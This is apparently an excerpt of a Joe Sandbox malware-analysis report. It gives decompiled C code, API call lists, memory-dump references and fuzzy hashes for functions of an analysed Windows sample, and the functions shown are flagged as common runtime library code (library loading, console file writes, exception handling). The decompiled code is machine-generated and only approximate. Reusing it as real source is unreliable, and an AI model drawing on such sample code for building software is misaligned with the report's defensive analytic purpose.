                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1096550386-0
                                                                                              • Opcode ID: 82afe60a9887c0abd65ff5de17f291167fb994eb203d4a956d5339fce2fd6815
                                                                                              • Instruction ID: 6435051520d24cc23639a14863cde9d17072ad57e44c7eba3076ae43914f0473
                                                                                              • Opcode Fuzzy Hash: 82afe60a9887c0abd65ff5de17f291167fb994eb203d4a956d5339fce2fd6815
                                                                                              • Instruction Fuzzy Hash: AD51E372A00206AFEB205EA58C81EBB77B9EF44714F16413EFC04F6291E638EC54C669
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004025F3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004025F3(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E004062C8(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                                                              0x00402600
                                                                                              0x00402608
                                                                                              0x0040263d
                                                                                              0x0040260a
                                                                                              0x00402613
                                                                                              0x00000000
                                                                                              0x0040263a
                                                                                              0x00402639
                                                                                              0x00402639

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,004025A4,00000000,?,00418CC0,?,?,?,00402747,00000004,InitializeCriticalSectionEx,00411CC8,InitializeCriticalSectionEx), ref: 00402600
                                                                                              • GetLastError.KERNEL32(?,004025A4,00000000,?,00418CC0,?,?,?,00402747,00000004,InitializeCriticalSectionEx,00411CC8,InitializeCriticalSectionEx,00000000,?,004024C7), ref: 0040260A
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402632
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: 9777450d2c7266b1ae24b096af559e61f24cab0272a2f4c836f5e2f2433084bc
                                                                                              • Instruction ID: db7c22574297e231bba8cd6a76ac84f7806fd205541df7f48677b06135d6bd3e
                                                                                              • Opcode Fuzzy Hash: 9777450d2c7266b1ae24b096af559e61f24cab0272a2f4c836f5e2f2433084bc
                                                                                              • Instruction Fuzzy Hash: 25E04830A80205B7DF101B61DD0BF9A3E54AB10B55F10C432FA4DB45F1E7BA9851955C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C7C0 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E0040C7C0(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				signed int _v35;
				signed char _v36;
				void _v44;
				signed char* _v48;
				char _v49;
				long _v56;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				signed char* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				char _v108;
				int _v112;
				intOrPtr _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed char* _t186;
				signed int _t190;
				void* _t196;
				long _t197;
				long _t201;
				signed char* _t207;
				void _t209;
				signed char* _t214;
				void* _t221;
				signed int _t224;
				char* _t228;
				void* _t237;
				long _t243;
				signed int _t244;
				signed char* _t245;
				void* _t255;
				intOrPtr _t261;
				void* _t262;
				struct _OVERLAPPED* _t263;
				intOrPtr* _t264;
				signed int _t265;
				intOrPtr _t266;
				struct _OVERLAPPED* _t274;
				signed int _t276;
				signed char _t281;
				signed int _t285;
				signed char* _t286;
				struct _OVERLAPPED* _t289;
				void* _t292;
				signed int _t293;
				void* _t295;
				struct _OVERLAPPED* _t296;
				signed char* _t298;
				intOrPtr* _t299;
				void* _t300;
				signed int _t301;
				long _t302;
				signed int _t304;
				signed int _t305;
				void* _t306;
				void* _t307;
				void* _t308;

				_push(0xffffffff);
				_push(0x410e59);
				_push( *[fs:0x0]);
				_t307 = _t306 - 0x74;
				_t174 =  *0x418014; // 0xcd317e6f
				_t175 = _t174 ^ _t305;
				_v20 = _t175;
				_push(_t175);
				 *[fs:0x0] =  &_v16;
				_t177 = _a8;
				_t298 = _a12;
				_t261 = _a20;
				_t265 = (_t177 & 0x0000003f) * 0x38;
				_t285 = _t177 >> 6;
				_v100 = _t298;
				_v64 = _t261;
				_v72 = _t285;
				_v84 = _t265;
				_v104 =  *((intOrPtr*)(_t265 +  *((intOrPtr*)(0x418ec0 + _t285 * 4)) + 0x18));
				_v88 = _a16 + _t298;
				_v112 = GetConsoleOutputCP();
				if( *((char*)(_t261 + 0x14)) == 0) {
					E004047F0(_t261, _t285);
				}
				_t299 = _a4;
				_t266 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0xc)) + 8));
				asm("stosd");
				_v116 = _t266;
				asm("stosd");
				asm("stosd");
				_t186 = _v100;
				_t286 = _t186;
				_v48 = _t286;
				if(_t186 < _v88) {
					_t293 = _v84;
					_t263 = 0;
					_v76 = 0;
					while(1) {
						_v49 =  *_t286;
						_t190 = _v72;
						_v68 = _t263;
						_v56 = 1;
						if(_t266 != 0xfde9) {
							goto L22;
						}
						_t274 = _t263;
						_t228 =  *(0x418ec0 + _t190 * 4) + 0x2e + _t293;
						_v76 = _t228;
						while( *_t228 != 0) {
							_t274 =  &(_t274->Internal);
							_t228 = _t228 + 1;
							if(_t274 < 5) {
								continue;
							}
							break;
						}
						_t295 = _v88 - _t286;
						_v56 = _t274;
						if(_t274 <= 0) {
							_t276 =  *((char*)(( *_t286 & 0x000000ff) + 0x4181c8)) + 1;
							_v80 = _t276;
							if(_t276 > _t295) {
								if(_t295 <= 0) {
									goto L44;
								} else {
									_t301 = _v84;
									do {
										 *((char*)( *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _t301 + _t263 + 0x2e)) =  *((intOrPtr*)(_t263 + _t286));
										_t263 =  &(_t263->Internal);
									} while (_t263 < _t295);
									goto L43;
								}
								L52:
							} else {
								_v132 = _t263;
								_v128 = _t263;
								_v60 = _t286;
								_v56 = (_t276 == 4) + 1;
								_t237 = E0040E049( &_v132,  &_v68,  &_v60, (_t276 == 4) + 1,  &_v132, _v64);
								_t308 = _t307 + 0x14;
								if(_t237 != 0xffffffff) {
									_t293 = _v84;
									goto L21;
								}
							}
						} else {
							_t243 =  *((char*)(( *_v76 & 0x000000ff) + 0x4181c8)) + 1;
							_v60 = _t243;
							_t244 = _t243 - _t274;
							_v80 = _t244;
							if(_t244 > _t295) {
								if(_t295 > 0) {
									_t245 = _v48;
									_t302 = _v56;
									do {
										_t281 =  *((intOrPtr*)(_t263 + _t245));
										_t286 =  *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _v84 + _t263;
										_t263 =  &(_t263->Internal);
										_t286[_t302 + 0x2e] = _t281;
									} while (_t263 < _t295);
									L43:
									_t299 = _a4;
								}
								L44:
								 *(_t299 + 4) =  &(( *(_t299 + 4))[_t295]);
							} else {
								_t296 = _t263;
								_t264 = _v76;
								do {
									 *((char*)(_t305 + _t296 - 0x18)) =  *_t264;
									_t296 =  &(_t296->Internal);
									_t264 = _t264 + 1;
								} while (_t296 < _t274);
								_t303 = _v80;
								_t263 = 0;
								if(_v80 > 0) {
									E00402B30( &_v28 + _t274, _t286, _t303);
									_t274 = _v56;
									_t307 = _t307 + 0xc;
								}
								_t293 = _v84;
								_t289 = _t263;
								_t304 = _v72;
								do {
									 *( *((intOrPtr*)(0x418ec0 + _t304 * 4)) + _t293 + _t289 + 0x2e) = _t263;
									_t289 =  &(_t289->Internal);
								} while (_t289 < _t274);
								_t299 = _a4;
								_v108 =  &_v28;
								_v124 = _t263;
								_v120 = _t263;
								_v56 = (_v60 == 4) + 1;
								_t255 = E0040E049( &_v124,  &_v68,  &_v108, (_v60 == 4) + 1,  &_v124, _v64);
								_t308 = _t307 + 0x14;
								if(_t255 != 0xffffffff) {
									L21:
									_t197 =  &(_v48[_v80]) - 1;
									L31:
									_v48 = _t197 + 1;
									_t201 = E004099F0(_v112, _t263,  &_v68, _v56,  &_v44, 5, _t263, _t263);
									_t307 = _t308 + 0x20;
									_v60 = _t201;
									if(_t201 != 0) {
										if(WriteFile(_v104,  &_v44, _t201,  &_v96, _t263) == 0) {
											L50:
											 *_t299 = GetLastError();
										} else {
											_t286 = _v48;
											_t207 =  *((intOrPtr*)(_t299 + 8)) - _v100 + _t286;
											_v76 = _t207;
											 *(_t299 + 4) = _t207;
											if(_v96 >= _v60) {
												if(_v49 != 0xa) {
													L38:
													if(_t286 < _v88) {
														_t266 = _v116;
														continue;
													}
												} else {
													_t209 = 0xd;
													_v92 = _t209;
													if(WriteFile(_v104,  &_v92, 1,  &_v96, _t263) == 0) {
														goto L50;
													} else {
														if(_v96 >= 1) {
															 *((intOrPtr*)(_t299 + 8)) =  *((intOrPtr*)(_t299 + 8)) + 1;
															 *(_t299 + 4) =  &(( *(_t299 + 4))[1]);
															_t286 = _v48;
															_v76 =  *(_t299 + 4);
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L22:
						_t271 =  *(0x418ec0 + _t190 * 4);
						_v80 = _t271;
						if(( *(_t271 + _t293 + 0x2d) & 0x00000004) == 0) {
							_t271 =  *_t286 & 0x000000ff;
							if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc)))) + ( *_t286 & 0x000000ff) * 2)) >= _t263) {
								_push(_v64);
								_push(1);
								_push(_t286);
								goto L29;
							} else {
								_t214 =  &(_t286[1]);
								_v60 = _t214;
								if(_t214 >= _v88) {
									 *((char*)(_v80 + _t293 + 0x2e)) =  *_t286;
									 *( *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _t293 + 0x2d) =  *( *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _t293 + 0x2d) | 0x00000004;
									 *(_t299 + 4) =  &(_v76[1]);
								} else {
									_t221 = E0040B904(_t271, _t286,  &_v68, _t286, 2, _v64);
									_t308 = _t307 + 0x10;
									if(_t221 != 0xffffffff) {
										_t197 = _v60;
										goto L31;
									}
								}
							}
						} else {
							_push(_v64);
							_v36 =  *(_t271 + _t293 + 0x2e) & 0x000000fb;
							_t224 =  *_t286;
							_v35 = _t224;
							 *(_t271 + _t293 + 0x2d) = _t224;
							_push(2);
							_push( &_v36);
							L29:
							_push( &_v68);
							_t196 = E0040B904(_t271, _t286);
							_t308 = _t307 + 0x10;
							if(_t196 != 0xffffffff) {
								_t197 = _v48;
								goto L31;
							}
						}
						goto L51;
					}
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t292);
				_pop(_t300);
				_pop(_t262);
				return E00401BA5(_t299, _t262, _v20 ^ _t305, _t286, _t292, _t300);
				goto L52;
			}















































































                                                                                              0x0040c7c5
                                                                                              0x0040c7c7
                                                                                              0x0040c7d2
                                                                                              0x0040c7d3
                                                                                              0x0040c7d6
                                                                                              0x0040c7db
                                                                                              0x0040c7dd
                                                                                              0x0040c7e3
                                                                                              0x0040c7e7
                                                                                              0x0040c7ed
                                                                                              0x0040c7f2
                                                                                              0x0040c7f8
                                                                                              0x0040c7fb
                                                                                              0x0040c7fe
                                                                                              0x0040c801
                                                                                              0x0040c804
                                                                                              0x0040c807
                                                                                              0x0040c811
                                                                                              0x0040c818
                                                                                              0x0040c820
                                                                                              0x0040c82d
                                                                                              0x0040c830
                                                                                              0x0040c834
                                                                                              0x0040c834
                                                                                              0x0040c83c
                                                                                              0x0040c841
                                                                                              0x0040c846
                                                                                              0x0040c847
                                                                                              0x0040c84a
                                                                                              0x0040c84b
                                                                                              0x0040c84c
                                                                                              0x0040c84f
                                                                                              0x0040c851
                                                                                              0x0040c857
                                                                                              0x0040c85d
                                                                                              0x0040c860
                                                                                              0x0040c862
                                                                                              0x0040c865
                                                                                              0x0040c867
                                                                                              0x0040c86a
                                                                                              0x0040c86d
                                                                                              0x0040c870
                                                                                              0x0040c87d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c88a
                                                                                              0x0040c88f
                                                                                              0x0040c891
                                                                                              0x0040c894
                                                                                              0x0040c899
                                                                                              0x0040c89a
                                                                                              0x0040c89e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c89e
                                                                                              0x0040c8a3
                                                                                              0x0040c8a5
                                                                                              0x0040c8aa
                                                                                              0x0040c95e
                                                                                              0x0040c95f
                                                                                              0x0040c964
                                                                                              0x0040cb1e
                                                                                              0x00000000
                                                                                              0x0040cb20
                                                                                              0x0040cb20
                                                                                              0x0040cb23
                                                                                              0x0040cb32
                                                                                              0x0040cb36
                                                                                              0x0040cb37
                                                                                              0x00000000
                                                                                              0x0040cb3b
                                                                                              0x00000000
                                                                                              0x0040c96a
                                                                                              0x0040c96f
                                                                                              0x0040c975
                                                                                              0x0040c97b
                                                                                              0x0040c984
                                                                                              0x0040c98f
                                                                                              0x0040c994
                                                                                              0x0040c99a
                                                                                              0x0040c9a0
                                                                                              0x00000000
                                                                                              0x0040c9a0
                                                                                              0x0040c99a
                                                                                              0x0040c8b0
                                                                                              0x0040c8bd
                                                                                              0x0040c8be
                                                                                              0x0040c8c1
                                                                                              0x0040c8c3
                                                                                              0x0040c8c8
                                                                                              0x0040caf1
                                                                                              0x0040caf3
                                                                                              0x0040caf6
                                                                                              0x0040caf9
                                                                                              0x0040cb06
                                                                                              0x0040cb09
                                                                                              0x0040cb0b
                                                                                              0x0040cb0c
                                                                                              0x0040cb10
                                                                                              0x0040cb14
                                                                                              0x0040cb14
                                                                                              0x0040cb14
                                                                                              0x0040cb17
                                                                                              0x0040cb17
                                                                                              0x0040c8ce
                                                                                              0x0040c8ce
                                                                                              0x0040c8d0
                                                                                              0x0040c8d3
                                                                                              0x0040c8d5
                                                                                              0x0040c8d9
                                                                                              0x0040c8da
                                                                                              0x0040c8db
                                                                                              0x0040c8df
                                                                                              0x0040c8e2
                                                                                              0x0040c8e6
                                                                                              0x0040c8f0
                                                                                              0x0040c8f5
                                                                                              0x0040c8f8
                                                                                              0x0040c8f8
                                                                                              0x0040c8fb
                                                                                              0x0040c8fe
                                                                                              0x0040c900
                                                                                              0x0040c903
                                                                                              0x0040c90c
                                                                                              0x0040c910
                                                                                              0x0040c911
                                                                                              0x0040c918
                                                                                              0x0040c91e
                                                                                              0x0040c926
                                                                                              0x0040c931
                                                                                              0x0040c936
                                                                                              0x0040c941
                                                                                              0x0040c946
                                                                                              0x0040c94c
                                                                                              0x0040c9a3
                                                                                              0x0040c9a9
                                                                                              0x0040ca3e
                                                                                              0x0040ca43
                                                                                              0x0040ca55
                                                                                              0x0040ca5a
                                                                                              0x0040ca5d
                                                                                              0x0040ca62
                                                                                              0x0040ca7d
                                                                                              0x0040cb5e
                                                                                              0x0040cb64
                                                                                              0x0040ca83
                                                                                              0x0040ca89
                                                                                              0x0040ca8c
                                                                                              0x0040ca8e
                                                                                              0x0040ca91
                                                                                              0x0040ca9a
                                                                                              0x0040caa4
                                                                                              0x0040cae2
                                                                                              0x0040cae5
                                                                                              0x0040cae7
                                                                                              0x00000000
                                                                                              0x0040cae7
                                                                                              0x0040caa6
                                                                                              0x0040caa8
                                                                                              0x0040caaa
                                                                                              0x0040cac3
                                                                                              0x00000000
                                                                                              0x0040cac9
                                                                                              0x0040cacd
                                                                                              0x0040cad3
                                                                                              0x0040cad6
                                                                                              0x0040cadc
                                                                                              0x0040cadf
                                                                                              0x00000000
                                                                                              0x0040cadf
                                                                                              0x0040cacd
                                                                                              0x0040cac3
                                                                                              0x0040caa4
                                                                                              0x0040ca9a
                                                                                              0x0040ca7d
                                                                                              0x0040ca62
                                                                                              0x0040c94c
                                                                                              0x0040c8c8
                                                                                              0x00000000
                                                                                              0x0040c9af
                                                                                              0x0040c9af
                                                                                              0x0040c9b6
                                                                                              0x0040c9c0
                                                                                              0x0040c9e3
                                                                                              0x0040c9ef
                                                                                              0x0040ca20
                                                                                              0x0040ca23
                                                                                              0x0040ca25
                                                                                              0x00000000
                                                                                              0x0040c9f1
                                                                                              0x0040c9f1
                                                                                              0x0040c9f4
                                                                                              0x0040c9fa
                                                                                              0x0040cb42
                                                                                              0x0040cb50
                                                                                              0x0040cb59
                                                                                              0x0040ca00
                                                                                              0x0040ca0a
                                                                                              0x0040ca0f
                                                                                              0x0040ca15
                                                                                              0x0040ca1b
                                                                                              0x00000000
                                                                                              0x0040ca1b
                                                                                              0x0040ca15
                                                                                              0x0040c9fa
                                                                                              0x0040c9c2
                                                                                              0x0040c9c9
                                                                                              0x0040c9cc
                                                                                              0x0040c9cf
                                                                                              0x0040c9d1
                                                                                              0x0040c9d4
                                                                                              0x0040c9db
                                                                                              0x0040c9dd
                                                                                              0x0040ca26
                                                                                              0x0040ca29
                                                                                              0x0040ca2a
                                                                                              0x0040ca2f
                                                                                              0x0040ca35
                                                                                              0x0040ca3b
                                                                                              0x00000000
                                                                                              0x0040ca3b
                                                                                              0x0040ca35
                                                                                              0x00000000
                                                                                              0x0040c9c0
                                                                                              0x0040c865
                                                                                              0x0040cb66
                                                                                              0x0040cb6b
                                                                                              0x0040cb73
                                                                                              0x0040cb74
                                                                                              0x0040cb75
                                                                                              0x0040cb81
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetConsoleOutputCP.KERNEL32(CD317E6F,00000000,00000000,?), ref: 0040C823
                                                                                                • Part of subcall function 004099F0: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0040DB6F,?,00000000,-00000008), ref: 00409A51
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040CA75
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040CABB
                                                                                              • GetLastError.KERNEL32 ref: 0040CB5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                              • String ID:
                                                                                              • API String ID: 2112829910-0
                                                                                              • Opcode ID: f7af8f4b823bec8e6fad4fd1700f01247cc12c7180dd96bb56a8ad6a8e2bb49f
                                                                                              • Instruction ID: 927ae0c99c5e2ec7a735149f3500559b32b72cb2f39fd742d4981e27d1a213e2
                                                                                              • Opcode Fuzzy Hash: f7af8f4b823bec8e6fad4fd1700f01247cc12c7180dd96bb56a8ad6a8e2bb49f
                                                                                              • Instruction Fuzzy Hash: ACD16AB5E00248DFCB14CFA8D8C0AEEBBB5EF49314F24422AE515FB391D634A941CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004030A4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E004030A4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x416588);
				E00401980(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00402B30(_t107, E0040201C(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00402B30(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x418c94; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x4111c0();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E004061FE(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x4165a8);
									E00401980(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E004030A4(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00403E14(_t103, _t108[0x18], E0040201C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00403E24(_t103, _t108[0x18], E0040201C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E0040201C();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                                                                              0x004030a4
                                                                                              0x004030a6
                                                                                              0x004030ab
                                                                                              0x004030b0
                                                                                              0x004030b2
                                                                                              0x004030b5
                                                                                              0x004030ba
                                                                                              0x004031ca
                                                                                              0x004031ca
                                                                                              0x004031ca
                                                                                              0x00000000
                                                                                              0x004030c9
                                                                                              0x004030c9
                                                                                              0x004030ce
                                                                                              0x004030d8
                                                                                              0x004030da
                                                                                              0x004030df
                                                                                              0x004030e4
                                                                                              0x004030e4
                                                                                              0x004030e6
                                                                                              0x004030e9
                                                                                              0x004030ee
                                                                                              0x00403110
                                                                                              0x00403110
                                                                                              0x00403113
                                                                                              0x00403116
                                                                                              0x00403134
                                                                                              0x00403137
                                                                                              0x00403176
                                                                                              0x00403179
                                                                                              0x0040317c
                                                                                              0x004031a1
                                                                                              0x004031a3
                                                                                              0x00000000
                                                                                              0x004031a5
                                                                                              0x004031a5
                                                                                              0x004031a7
                                                                                              0x00000000
                                                                                              0x004031a9
                                                                                              0x004031a9
                                                                                              0x004031ae
                                                                                              0x004031b2
                                                                                              0x004031b2
                                                                                              0x004031b3
                                                                                              0x00000000
                                                                                              0x004031b3
                                                                                              0x004031a7
                                                                                              0x0040317e
                                                                                              0x0040317e
                                                                                              0x00403180
                                                                                              0x00000000
                                                                                              0x00403182
                                                                                              0x00403182
                                                                                              0x00403184
                                                                                              0x00000000
                                                                                              0x00403186
                                                                                              0x00403197
                                                                                              0x00000000
                                                                                              0x0040319c
                                                                                              0x00403184
                                                                                              0x00403180
                                                                                              0x00403139
                                                                                              0x00403139
                                                                                              0x0040313d
                                                                                              0x00000000
                                                                                              0x00403143
                                                                                              0x00403143
                                                                                              0x00403145
                                                                                              0x00000000
                                                                                              0x0040314b
                                                                                              0x00403152
                                                                                              0x0040315a
                                                                                              0x0040315e
                                                                                              0x00403160
                                                                                              0x00403163
                                                                                              0x00403168
                                                                                              0x00403169
                                                                                              0x00000000
                                                                                              0x00403169
                                                                                              0x00403163
                                                                                              0x00000000
                                                                                              0x0040315e
                                                                                              0x00403145
                                                                                              0x0040313d
                                                                                              0x00403118
                                                                                              0x00403118
                                                                                              0x00000000
                                                                                              0x00403118
                                                                                              0x004030f5
                                                                                              0x004030f5
                                                                                              0x004030fa
                                                                                              0x004030ff
                                                                                              0x00000000
                                                                                              0x00403101
                                                                                              0x00403103
                                                                                              0x0040310c
                                                                                              0x0040311b
                                                                                              0x0040311d
                                                                                              0x004031dc
                                                                                              0x004031dc
                                                                                              0x004031e1
                                                                                              0x004031e2
                                                                                              0x004031e4
                                                                                              0x004031e9
                                                                                              0x004031ee
                                                                                              0x004031f1
                                                                                              0x004031f4
                                                                                              0x004031f7
                                                                                              0x00403200
                                                                                              0x00403200
                                                                                              0x004031f9
                                                                                              0x004031f9
                                                                                              0x004031f9
                                                                                              0x00403203
                                                                                              0x00403207
                                                                                              0x0040320a
                                                                                              0x0040320b
                                                                                              0x0040320c
                                                                                              0x0040320d
                                                                                              0x00403210
                                                                                              0x00403219
                                                                                              0x00403219
                                                                                              0x0040321c
                                                                                              0x00403252
                                                                                              0x0040321e
                                                                                              0x0040321e
                                                                                              0x0040321e
                                                                                              0x00403221
                                                                                              0x00403238
                                                                                              0x00403238
                                                                                              0x00403221
                                                                                              0x00403257
                                                                                              0x00403261
                                                                                              0x0040326d
                                                                                              0x0040312b
                                                                                              0x0040312b
                                                                                              0x00403130
                                                                                              0x00403131
                                                                                              0x0040316b
                                                                                              0x00403172
                                                                                              0x004031b6
                                                                                              0x004031b6
                                                                                              0x004031bd
                                                                                              0x004031cc
                                                                                              0x004031cf
                                                                                              0x004031db
                                                                                              0x004031db
                                                                                              0x0040311d
                                                                                              0x004030ff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004030ce

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
